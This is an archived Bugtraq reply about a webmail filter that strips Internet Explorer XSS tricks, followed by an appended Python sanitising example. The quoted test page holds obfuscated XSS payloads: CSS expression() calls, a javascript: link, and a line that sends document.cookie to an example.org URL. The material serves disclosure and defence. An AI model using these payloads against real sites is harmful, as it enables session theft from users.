Bugtraq mailing list archives

Re: Webmails + Internet Explorer can create unwanted javascript execution


From: "Jason Munro" <jason () stdbev com>
Date: Fri, 3 Oct 2003 11:56:47 -0500

On October 2, 4:39 pm Jedi/Sector One <j () pureftpd org> wrote:

FWIW, Hastymail (a lesser-known webmail IMAP client written in PHP I'm
working on) does filter out this nastiness.

HTML before:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
               "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
  <title>Webmail test</title>
  <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:&#x65;xpres\sion(alert(1))">
  <style type="text/css">
h1 {
  he\ight:&#x65;\xpression(alert(2));
  bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.c
ookie+$
}
  </style>
  <h1 style="width:&#x65;xpression(alert(3))">...</h1>
  <div id="just-for-fun">
    <a href="&#x6A;avascript:window.open(document.location);"
       onmouseover="alert(4)">fireworks</a>
  </div>
</body>
</html>

HTML after:
<!-- begin sanitized html -->

  <h1 style="width:idiocy(alert(3))">...</h1>
  <div id="just-for-fun">
    <a>fireworks</a>
  </div>


<!-- end sanitized html -->

The default filter settings do not allow HTML hyperlinks, but this can be
adjusted by the user, producing this output for the 'fireworks' link
instead:

<a href="blah:window.open(document.location);" target="_new">fireworks</a>

Hastymail uses the PHP HTML filter written by Konstantin Riabitsev found
here:

http://www.mricon.com/html/phpfilter.html

The filter parameters are set very tightly to avoid this kind of issue.
While SquirrelMail's filter is based on the same engine, apparently either
it's not up to date or the params are not set as tightly.

\_____ Jason Munro ________________________
 \_____ jason () stdbev com ___________________
  \_____ #hastymail at irc.freenode.net _____
   \_____ http://hastymail.sourceforge.net ___
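As an added example (not Hastymail's or phpfilter's code; written in Python rather than the project's PHP), this shows the normalisation a filter must perform before it can recognise the obfuscated values in the test page above: HTML entity decoding, then CSS comment and backslash-escape removal, and the same scheme check for hrefs. It generalises beyond the post's `\s`-style escapes to CSS hex escapes (`\65 xpression`) and comment splitting; the `idiocy(` rewrite mirrors the sanitized output quoted in the post.

```python
import html
import re

# One pass resolves both CSS escape forms a CSS tokenizer accepts:
# \ + 1..6 hex digits (+ optional single whitespace), or \ + any one char.
# A single pass avoids re-interpreting a backslash produced by \5c.
_CSS_ESCAPE = re.compile(r'\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))', re.S)
_CSS_COMMENT = re.compile(r'/\*.*?\*/', re.S)
_SCRIPT_SCHEMES = {'javascript', 'vbscript', 'data'}


def _unescape_css(m):
    if m.group(1) is not None:
        cp = int(m.group(1), 16)
        # Out-of-range or NUL code points map to U+FFFD as per CSS.
        return chr(cp) if 0 < cp <= 0x10FFFF else '\ufffd'
    return m.group(2)


def normalize_css(value):
    """Undo the obfuscations in the test page in the order a browser applies
    them: entity references in the attribute value (&#x65; -> e) first, then
    CSS comments and backslash escapes (expres\\sion, \\65 xpression) which
    IE's CSS parser swallowed before it ever matched 'expression'."""
    value = html.unescape(value)
    value = _CSS_COMMENT.sub('', value)
    return _CSS_ESCAPE.sub(_unescape_css, value)


def neutralize_css(value):
    """Filter a style value: normalize, then rename expression( so that the
    engine no longer evaluates it (the 'idiocy(' name copies the quoted
    filter output; dropping the whole declaration is an equally valid choice)."""
    norm = normalize_css(value)
    return re.sub(r'expression\s*\(', 'idiocy(', norm, flags=re.I)


def is_script_href(href):
    """True when an href resolves to a script scheme after the decoding a
    browser does: entity decoding, then control characters (tab, newline)
    dropped from the scheme part, which IE tolerated inside 'javascript:'."""
    decoded = html.unescape(href).strip()
    scheme = re.sub(r'[\x00-\x20]', '', decoded.split(':', 1)[0]).lower()
    return ':' in decoded and scheme in _SCRIPT_SCHEMES


if __name__ == '__main__':
    # Constructed inputs taken from the test HTML quoted in the post.
    print(neutralize_css('width:&#x65;xpression(alert(3))'))
    print(is_script_href('&#x6A;avascript:window.open(document.location);'))
```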

